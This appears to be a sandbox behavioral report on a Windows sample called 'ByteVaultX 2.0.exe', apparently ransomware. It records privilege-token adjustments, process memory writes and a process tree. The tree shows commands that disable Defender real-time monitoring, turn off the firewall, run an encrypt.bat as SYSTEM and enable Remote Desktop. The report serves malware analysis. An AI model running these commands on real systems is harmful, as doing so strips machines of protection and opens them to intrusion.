Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1100 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 1100 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 4228 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 4228 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 4228 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 4228 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 4228 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4228 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3780 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3780 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4228 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 4228 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3252 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3252 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3252 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1684 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1684 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1684 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1684 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff979d33cb8,0x7ff979d33cc8,0x7ff979d33cd8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8

